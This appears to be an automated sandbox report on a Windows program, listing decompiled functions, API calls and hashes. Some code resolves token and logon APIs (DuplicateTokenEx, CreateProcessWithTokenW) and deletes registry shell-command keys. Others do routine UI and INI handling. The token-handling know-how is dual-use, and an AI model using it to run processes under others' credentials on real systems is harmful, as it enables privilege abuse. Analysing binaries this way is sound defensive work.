                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                          • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                                                                                                                          • API String ID: 2238633743-1970996977
                                                                                                                                                                                                                          • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                                          			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                                                                                                                          0x004045c2
                                                                                                                                                                                                                          0x004045d1
                                                                                                                                                                                                                          0x004045da
                                                                                                                                                                                                                          0x004045ef
                                                                                                                                                                                                                          0x004045f6
                                                                                                                                                                                                                          0x00404604
                                                                                                                                                                                                                          0x0040460b
                                                                                                                                                                                                                          0x00404610
                                                                                                                                                                                                                          0x00404616
                                                                                                                                                                                                                          0x00404617
                                                                                                                                                                                                                          0x00404618
                                                                                                                                                                                                                          0x00404628
                                                                                                                                                                                                                          0x00404629
                                                                                                                                                                                                                          0x0040462a
                                                                                                                                                                                                                          0x0040462f
                                                                                                                                                                                                                          0x00404630
                                                                                                                                                                                                                          0x00404631
                                                                                                                                                                                                                          0x0040463c
                                                                                                                                                                                                                          0x0040463d
                                                                                                                                                                                                                          0x0040463e
                                                                                                                                                                                                                          0x00404656
                                                                                                                                                                                                                          0x00404662
                                                                                                                                                                                                                          0x0040466b
                                                                                                                                                                                                                          0x0040466d
                                                                                                                                                                                                                          0x0040466e
                                                                                                                                                                                                                          0x00404674
                                                                                                                                                                                                                          0x00404679

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Delete_snwprintfmemset$Close
                                                                                                                                                                                                                          • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                                                                                                                          • API String ID: 1018939227-3575174989
                                                                                                                                                                                                                          • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                                                                                          0x0040314a
                                                                                                                                                                                                                          0x00403151
                                                                                                                                                                                                                          0x00403158
                                                                                                                                                                                                                          0x0040315a
                                                                                                                                                                                                                          0x00403162
                                                                                                                                                                                                                          0x00403166
                                                                                                                                                                                                                          0x00403190
                                                                                                                                                                                                                          0x00403190
                                                                                                                                                                                                                          0x00403198
                                                                                                                                                                                                                          0x00403199
                                                                                                                                                                                                                          0x0040319e
                                                                                                                                                                                                                          0x004031bb
                                                                                                                                                                                                                          0x004031a0
                                                                                                                                                                                                                          0x004031ad
                                                                                                                                                                                                                          0x004031b6
                                                                                                                                                                                                                          0x004031b6
                                                                                                                                                                                                                          0x0040319e
                                                                                                                                                                                                                          0x0040316e
                                                                                                                                                                                                                          0x00403176
                                                                                                                                                                                                                          0x0040317c
                                                                                                                                                                                                                          0x0040317f
                                                                                                                                                                                                                          0x0040317f
                                                                                                                                                                                                                          0x00403182
                                                                                                                                                                                                                          0x0040318a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040318c
                                                                                                                                                                                                                          0x0040318c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040318c

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                                                                          • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                          • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                                                                                                                          0x00404da9
                                                                                                                                                                                                                          0x00404dbc
                                                                                                                                                                                                                          0x00404dbf
                                                                                                                                                                                                                          0x00404dc6
                                                                                                                                                                                                                          0x00404dcc
                                                                                                                                                                                                                          0x00404dce
                                                                                                                                                                                                                          0x00404de1
                                                                                                                                                                                                                          0x00404deb
                                                                                                                                                                                                                          0x00404df2
                                                                                                                                                                                                                          0x00404df4
                                                                                                                                                                                                                          0x00404df4
                                                                                                                                                                                                                          0x00404e07
                                                                                                                                                                                                                          0x00404e0d
                                                                                                                                                                                                                          0x00404e18
                                                                                                                                                                                                                          0x00404e1c
                                                                                                                                                                                                                          0x00404e1e
                                                                                                                                                                                                                          0x00404e27
                                                                                                                                                                                                                          0x00404e28
                                                                                                                                                                                                                          0x00404e29
                                                                                                                                                                                                                          0x00404e2f
                                                                                                                                                                                                                          0x00404e31
                                                                                                                                                                                                                          0x00404e37
                                                                                                                                                                                                                          0x00404e41
                                                                                                                                                                                                                          0x00404e42
                                                                                                                                                                                                                          0x00404e43
                                                                                                                                                                                                                          0x00404e46
                                                                                                                                                                                                                          0x00404e46
                                                                                                                                                                                                                          0x00404e1c
                                                                                                                                                                                                                          0x00404e4d
                                                                                                                                                                                                                          0x00404e50
                                                                                                                                                                                                                          0x00404e5f
                                                                                                                                                                                                                          0x00404e66
                                                                                                                                                                                                                          0x00404e52
                                                                                                                                                                                                                          0x00404e52
                                                                                                                                                                                                                          0x00404e52
                                                                                                                                                                                                                          0x00404e6d
                                                                                                                                                                                                                          0x00404e70
                                                                                                                                                                                                                          0x00404e85
                                                                                                                                                                                                                          0x00404e85
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404e72
                                                                                                                                                                                                                          0x00404e7b
                                                                                                                                                                                                                          0x00404e80
                                                                                                                                                                                                                          0x00404e83
                                                                                                                                                                                                                          0x00404e87
                                                                                                                                                                                                                          0x00404e89
                                                                                                                                                                                                                          0x00404e8b
                                                                                                                                                                                                                          0x00404e8b
                                                                                                                                                                                                                          0x00404ea8
                                                                                                                                                                                                                          0x00404ea8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404e83

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E07
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00404E12
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                                                          • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                                          			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                                                                                          0x0040639c
                                                                                                                                                                                                                          0x004063a4
                                                                                                                                                                                                                          0x004063b2
                                                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                                                          0x004063d3
                                                                                                                                                                                                                          0x004063dc
                                                                                                                                                                                                                          0x004063eb
                                                                                                                                                                                                                          0x004063f0
                                                                                                                                                                                                                          0x00406401
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040641e
                                                                                                                                                                                                                          0x0040641f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063B2
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063C2
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                                                                                                                            • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                          • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                                                                                          0x0040adf6
                                                                                                                                                                                                                          0x0040adf8
                                                                                                                                                                                                                          0x0040adfa
                                                                                                                                                                                                                          0x0040adfb
                                                                                                                                                                                                                          0x0040adfb
                                                                                                                                                                                                                          0x0040ae02
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae04
                                                                                                                                                                                                                          0x0040ae05
                                                                                                                                                                                                                          0x0040ae6d
                                                                                                                                                                                                                          0x0040ae6e
                                                                                                                                                                                                                          0x0040ae73
                                                                                                                                                                                                                          0x0040ae76
                                                                                                                                                                                                                          0x0040ae7f
                                                                                                                                                                                                                          0x0040ae83
                                                                                                                                                                                                                          0x0040ae86
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae86
                                                                                                                                                                                                                          0x0040ae8f
                                                                                                                                                                                                                          0x0040ae0c
                                                                                                                                                                                                                          0x0040ae10
                                                                                                                                                                                                                          0x0040ae1e
                                                                                                                                                                                                                          0x0040ae3b
                                                                                                                                                                                                                          0x0040ae4a
                                                                                                                                                                                                                          0x0040ae65
                                                                                                                                                                                                                          0x0040ae7a
                                                                                                                                                                                                                          0x0040ae7e
                                                                                                                                                                                                                          0x0040ae67
                                                                                                                                                                                                                          0x0040ae67
                                                                                                                                                                                                                          0x0040ae68
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae68
                                                                                                                                                                                                                          0x0040ae4c
                                                                                                                                                                                                                          0x0040ae4c
                                                                                                                                                                                                                          0x0040ae4e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae4e
                                                                                                                                                                                                                          0x0040ae3d
                                                                                                                                                                                                                          0x0040ae3d
                                                                                                                                                                                                                          0x0040ae3f
                                                                                                                                                                                                                          0x0040ae53
                                                                                                                                                                                                                          0x0040ae54
                                                                                                                                                                                                                          0x0040ae59
                                                                                                                                                                                                                          0x0040ae5c
                                                                                                                                                                                                                          0x0040ae5c
                                                                                                                                                                                                                          0x0040ae20
                                                                                                                                                                                                                          0x0040ae28
                                                                                                                                                                                                                          0x0040ae2d
                                                                                                                                                                                                                          0x0040ae30
                                                                                                                                                                                                                          0x0040ae30
                                                                                                                                                                                                                          0x0040ae12
                                                                                                                                                                                                                          0x0040ae12
                                                                                                                                                                                                                          0x0040ae13
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae13
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae10

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                          • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                                                                                                                          0x004041f9
                                                                                                                                                                                                                          0x00404205
                                                                                                                                                                                                                          0x00404208
                                                                                                                                                                                                                          0x00404217
                                                                                                                                                                                                                          0x0040421e
                                                                                                                                                                                                                          0x00404236
                                                                                                                                                                                                                          0x0040423f
                                                                                                                                                                                                                          0x0040424a
                                                                                                                                                                                                                          0x0040425f
                                                                                                                                                                                                                          0x0040426b
                                                                                                                                                                                                                          0x0040426e
                                                                                                                                                                                                                          0x0040426e
                                                                                                                                                                                                                          0x00404275
                                                                                                                                                                                                                          0x004043be
                                                                                                                                                                                                                          0x004043ce
